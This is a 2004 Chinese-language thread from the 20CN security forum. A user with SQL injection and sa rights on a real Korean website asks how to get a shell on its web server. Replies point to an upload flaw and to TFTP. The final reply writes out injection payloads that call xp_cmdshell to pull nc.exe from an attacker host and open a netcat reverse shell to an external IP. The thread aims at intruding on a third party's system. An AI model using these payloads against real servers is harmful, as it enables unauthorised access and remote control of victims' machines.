|
 | 作者: kin8211 [kin8211]
 论坛用户 |
登录 |
| 有个网站有SQL注入,成功注入后拿到sa权限,经测试后发现SQL处在内网IP段,web服务器在外网,如何才能拿到shell??(无法上传,编辑文件) |
| 地主 发表时间: 04-08-06 18:22 |
| 回复: kin8211 [kin8211] 论坛用户 |
登录 |
|
有人来说说吗 |
| B1层 发表时间: 04-08-07 01:52 |
 | 回复: TGV_Mic [tgv] |
登录 |
|
太难了,我基本不懂你在说什么,因为我刚开始学visual foxpro . 看你水平挺高,羡慕英才啊~交个朋友吧,我QQ:14995300 |
| B2层 发表时间: 04-08-07 09:05 |
| 回复: kin8211 [kin8211] 论坛用户 |
登录 |
 只会点注入之类的小玩意啦.... |
| B3层 发表时间: 04-08-07 13:11 |
 | 回复: abctm [abctm]  版主 |
登录 |
|
有图片上传漏洞么?有的话先入侵web服务器 |
| B4层 发表时间: 04-08-07 13:23 |
| 回复: kin8211 [kin8211] 论坛用户 |
登录 |
|
没有论坛,asp的,全是韩文偶看不懂呀,现在问题是拿到了sa 但拿不到webshell |
| B5层 发表时间: 04-08-07 13:25 |
| 回复: kin8211 [kin8211] 论坛用户 |
登录 |
|
另外还想请教下如果提SQL权限到SA的问题,请高手指点一下 |
| B6层 发表时间: 04-08-07 13:32 |
 | 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
入注成功以后用TFTP 上传文件! 在内网也可以上传的啊! 你说的我有点不明白! 能说的详细点么! 加我QQ607182 最近我也在玩这个! |
| B7层 发表时间: 04-08-07 15:24 |
| 回复: lqfrla [lqfrla]  论坛用户 |
登录 |
 |
| B8层 发表时间: 04-08-07 19:22 |
 | 回复: lgf [lgf]  论坛用户 |
登录 |
|
|
| B9层 发表时间: 04-08-07 22:00 |
| 回复: kin8211 [kin8211] 论坛用户 |
登录 |
|
TFTP传不上,估计对方做了安全策略或限制了sa的权限,无法dir c:\ |
| B10层 发表时间: 04-08-08 11:57 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
id=100;exec master.dbo.xp_cmdshell 'tftp -i x.x.x.x get nc.exe';-- 然后在本机nc -l -p 53 id=100;exec master.dbo.xp_cmdshell 'nc -e c:\winnt\system32\cmd.exe 61.128.100.73 53';-- 可以这样给数据库服务器上传文件啊! 你说的注入不是SQL 数据库没有过滤特殊字符么! 希望你能和我联系! 我们一起研究! 我的QQ607182 |
| B11层 发表时间: 04-08-08 16:50 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 请教:我拿到SQL,但SQL在内网如何拿到web主机的shell?